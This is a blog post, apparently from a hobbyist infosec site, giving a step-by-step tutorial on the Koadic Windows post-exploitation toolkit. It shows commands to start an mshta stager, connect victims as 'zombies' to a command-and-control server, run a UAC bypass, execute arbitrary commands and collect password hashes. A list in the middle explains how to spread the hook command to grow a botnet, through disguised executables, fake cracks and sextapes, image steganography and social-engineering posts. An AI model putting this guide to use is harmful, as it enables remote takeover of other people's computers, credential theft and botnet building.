top of page
Writer's picturealvin gitonga

KOADIC🤖: For your Windows Post-Exploitation💀 zombies & Botnets needs😈

CyberMorans🤗

The Koadic post-exploitation toolkit😈 serves as an alternative to tools like Meterpreter and PowerShell Empire🤨 While there is some difference in how payloads & exploits are delivered, Koadic provides a fully-featured environment to remotely perform tasks on an exploited Windows system🤫

Koadic provides two categories of functions; stagers and implants 😏


These allows hackers😈 to monitor and control exploited Windows systems remotely. The tool facilitates remote access to Windows devices via the Windows Script Host, working with practically every version of Windows. It is able to do this entirely in memory to evade detection and is also able to encrypt its own web c2 communications🙈


Stagers -- are used to create the actual remote-access connections through different Windows-based processes, and implants -- are used to complete tasks on systems which are already connected as zombie machines over the stager connection☠️

These 🙊 implants can execute commands, retrieve system keys and password hashes, play video and even take pictures with the webcam on the zombie device.💀

So, Morans, lets do this💪


 

🚀 Set up Koadic 🤖

Koadic can be run by entering on the terminal👇

koadic 

The most useful command to for an overview of how to use Koadic is 'help'👇

The 'help' command provides an overview of the different commands😎 available. Koadic functions similarly to other frameworks such as Metasploit🥳. It allows for individual modules to be loaded and configured. Once a module is selected, parameters set, then the module can be run😱. Koadic also provides autocomplete triggered by pressing Tab. Just like metasploit and meterpreter😌


First, load the mshta stager by running👇

use stager/js/mshta

The stager allows us to define where the Koadic command & control👽 is accessed by any "zombie" devices. You can view these settings by running 'info' once the stager is selected👇

The stager allows us to define the IP, port, and expiry date of the c&c, as well as keys and certificates if desired. The default port of "9999" . Please confirm that the "SRVHOST" IP value corresponds to your IP on your local network, or maybe to a VPS or server which Koadic is running on🤖. To set it manually, run the command below, where IP is the desired IP address for the staging server👇

set SRVHOST IP

Once the staging server is configured, it's ready🤖. Launch the stager by typing 'run' on the Koadic command line and hit Enter👇


 

🚀 Hook your first Zombie PC to the C&C 🤖

A Windows PC can be connected to the Koadic "mshta" staging server by running just one line on the cmd😰. This command, will begin with 'mshta' followed by the IP and port of the staging server. The command can also be found on the Koadic command log itself, as it is shown after running the stager👇

mshta http://192.168.0.105:9999/LJgy7

Once this command is run, the Windows device will be connected as a zombie to the c&c 👍

In a real-world attack😈, the command would generally be executed by another program, a USB Rubber Ducky, or an application exploit😎, rather than simply being run by the user within the command prompt. It also allows you to have alot of zombies for a botnet maybe. To grow and propagate this botnet of zombies👇
  1. 👉 You can write a bash/shell script that executes the command

  2. 👉 you can use steganography to embed this command on a multimedia file (jpg, png etc) and share it on a group on whatsapp or telegram

  3. 👉 you can use document macros like word, oneNote and PDFs

  4. 👉 You can use a .exe disguised as a game and share it on discord or twitch

  5. 👉 You can use a .scr file since it works like a .exe but few people know that.

  6. 👉 You can disguise it as something interesting and drop it on pirate bay...the latest movie or a game crack, or a sextape

  7. 👉 Social Engineering & Treachery -- Telling people on Twitter and Facebook to open cmd and enter the command supposedly to improve their internet connection or check if they can mine crypto

  8. ....etc....get creative and grow that botnet

Run this on the target windows machine👇


After the command is run, we can confirm that the zombie is connected by running 'zombies' command within Koadic👇


The first zombie connected will be assigned the ID of 0 (zero). To view more info on this zombie, run the command👇

zombies 0

This device is already pwnd😎, but not yet elevated (priviledges)😔

Next, we'll look at gaining additional user privileges on the zombie machine🤤


 

🚀 Elevate & Escalate priviledges 🤖

To test privilege escalation against the Windows machine, use the "Bypass User Account Control" implant😏. We can load this by running within Koadic 👇

use implant/elevate/bypassuac_eventvwr

Then, set the payload value in order to have the implant run. You can leave the value of "ZOMBIE" as "ALL" to attack all zombies, or set it to the specific zombie you wish to attack. To adjust the payload value, run the command 👇

set PAYLOAD 0

After the payload is set, we can launch the UAC bypass attempt by simply executing 'run' from the Koadic command line👇

When the task is complete, check that the privilege escalation attack was successful 🥲by checking the zombie information, To see the status of the first zombie device, run 'zombies 0' command 👇

When the "Elevated" status shows "YES!" the Windows device is now hooked and privilege escalation complete🥳🥳🥳


 

🚀 Koadic Post-Exploitation Implants 🤖

So now we have an exploited device👏 with elevated privileges👏, there are a number of rootkit functions😈 we can perform from the Koadic c&c. The "implant" modules, as shown below, shows a few of the capabilities available in Koadic👇


The "exec_cmd" implant allows you to run any command on the Windows system 🥲. To load this implant, run the command👇

use implant/manage/exec_cmd

To set a command, use the set command, same as when changing settings for other modules. To set the command to be run to dir 💨, which will return a list of files and directories, run the command👇

set CMD dir

To confirm these settings were changed, run info to view the module information👇

If the implant settings are set, simply type run and hit Enter to run the module👏👏

Other implants, such as the "gathering" tools shown below, attempt to capture important information such as user account details😜 and password hashes and send them to the command-and-control server👇

Koadic also provides several "fun" 😜implants. The "voice" implant uses Window's integrated text-to-speech tools 😏 to "speak" a message on the zombie computer😜


To use this implant, first run 'use implant/fun/voice'. The message can be set with 'set MESSAGE 'followed by the desired message to be spoken🤭. The specific zombies can also be set in the same way as in the previous modules or it can be left to the default value of "ALL" to be run on all zombies. Type 'run' and hit Enter👇


While these attacks have mixed success🥳, the majority of the rootkit implants are very effective, even on modern versions of Windows🤨. The limited detection possibility and potential for automation using Python scripts establishes Koadic as a potent remote-access toolkit capable of carrying out complex attacks😋

 

🚀Conclusion 🤖

Subscribe to receive notifications of similar posts 😜 where we will be reverse engineering malware, vulnerabilities as well as hacking tools, vectors, stories, tutorials and other Infosec stuff...😋


Follow me on twitter for daily Infosec Memes and shenanigans😝


Morans,

Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! 😋👊 💪

66 views0 comments

Recent Posts

See All

Comments


Post: Blog2_Post
bottom of page